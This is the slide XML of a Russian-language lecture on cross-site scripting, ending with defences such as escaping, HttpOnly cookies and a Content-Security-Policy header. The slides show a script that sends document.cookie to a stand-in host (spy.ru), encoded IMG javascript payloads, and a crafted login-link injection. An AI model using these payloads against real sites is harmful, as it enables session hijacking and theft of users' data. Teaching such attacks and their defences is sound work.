              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“http://spy.ru/saveCoockie.cgi?c=“ +</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>encodeURI(document.cookie);</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=`javascript:…`&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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de-DE" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>; …</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Text Box 3"/>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023B84A8-F6C7-4EE8-B1BD-DC0A28801D83}"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0"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5069880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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пассивный (нужно, чтобы админ или другой пользователь перешли по заранее сфабрикованной ссылке)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;input class="inputText" type="text" name= "email" value=“gudasergey@gmail.com" /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Text Box 3"/>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EE0F8138-DB80-435D-A5E9-CFA8CE3CB923}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="695160" y="3000240"/>
            <a:ext cx="7875000" cy="212184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4"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357120" y="1719360"/>
            <a:ext cx="8227440" cy="5136480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Хотим получить:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> &lt;input class="inputText" type="text" name= "email" value=“”&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;         &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Делаем ссылку:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сайт</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.ru/login.php?email=”&gt; &lt;script&gt;         &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Лучше: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сайт</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.ru/login.php?email= %22</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%3e%3c%73%63</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> …</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Text Box 3"/>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CCCCEAD1-A71E-4F0D-804F-B0E124E29C69}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2643120"/>
            <a:ext cx="855000" cy="855000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7858080" y="4071960"/>
            <a:ext cx="855000" cy="855000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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9"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Text Box 2"/>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30258919-16B5-486F-BBC6-D70B0B89DFDC}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="928800" y="1447920"/>
            <a:ext cx="7355880" cy="522864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2"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="44096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384" name="Text Box 3"/>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A8F79509-E1E1-4CC7-8B22-C80E4C502810}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428760" y="1500120"/>
            <a:ext cx="8422560" cy="5355720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="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6"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>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388" name="Text Box 3"/>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59CAB2C3-BB24-4213-A5F6-9389A59FC042}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="31680" y="1500120"/>
            <a:ext cx="9110160" cy="5131800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">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0" name="Text Box 6"/>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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Защита от XSS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Text Box 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357120" y="1719360"/>
            <a:ext cx="8227440" cy="5136480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="765"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1134"/>
              </a:spcAft>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Экранирование (кодирование) данных</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="765"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1701"/>
              </a:spcAft>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HttpOnly флаг для cookie (делает их недоступными для Javascript):</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00a933"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Set-Cookie: session_id=hYe3Nw; HttpOnly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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HTTP заголовок Content Security Policy (CSP) позволяет запретить встроенные и внешние скрипты:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00a933"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Content-Security-Policy: script-src 'self'</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Text Box 11"/>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5F077E66-97D9-4620-9831-BAF3ABE7D445}"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3"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Внедрение </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
